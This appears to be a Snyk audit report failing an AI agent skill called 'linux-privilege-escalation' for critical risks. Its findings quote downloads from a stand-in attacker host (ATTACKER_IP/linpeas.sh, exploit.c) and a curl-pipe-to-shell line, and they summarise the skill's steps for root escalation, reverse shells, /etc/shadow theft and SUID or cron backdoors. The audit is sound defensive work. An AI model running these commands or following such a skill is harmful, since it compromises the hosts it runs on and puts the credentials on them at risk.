linux-privilege-escalation

Fail

Audited by Snyk on Feb 28, 2026

Risk Level: CRITICAL
Full Analysis

CRITICAL E005: Suspicious download URL detected in skill instructions.

  • Suspicious download URL detected (high risk: 1.00). Although GTFOBins and the cited GitHub projects are legitimate resources, the presence of attacker-controlled URLs (http://ATTACKER_IP:8000/linpeas.sh and http://ATTACKER_IP/exploit.c) and instructions to download and execute .sh/.c payloads from an untrusted host make this a high‑risk, suspicious download vector that could distribute malware.

CRITICAL E006: Malicious code pattern detected in skill scripts.

  • Malicious code pattern detected (high risk: 1.00). The content is explicitly malicious and high-risk: it provides step-by-step instructions to achieve unauthorized system compromise including privilege escalation, remote code execution (reverse shells), credential theft (/etc/shadow access and cracking), persistence/backdoors (SUID shells, cron/job hijacking, NFS no_root_squash, LD_PRELOAD), and guidance to host/transfer and run exploits from attacker-controlled servers.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

  • Third-party content exposure detected (high risk: 1.00). The skill's Phase 2 "Automated Enumeration" explicitly instructs downloading and executing scripts from public GitHub URLs (e.g., curl -L https://github.com/.../linpeas.sh | sh) and to consult public resources like GTFOBins/exploit-db, which are untrusted third-party sources whose output the agent is expected to read and act on to choose exploitation steps.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).


MEDIUM W013: Attempt to modify system services in skill instructions.

  • Attempt to modify system services in skill instructions detected (high risk: 1.00). The skill explicitly instructs the agent to enumerate and exploit Linux systems to obtain root (kernel exploits, SUID abuse, sudo exploitation), modify system files (e.g., /etc/passwd, cron scripts), create setuid binaries and backdoors, and open reverse shells—directly guiding actions that compromise the host's state.
Audit Metadata
Risk Level
CRITICAL
Analyzed
Feb 28, 2026, 11:40 AM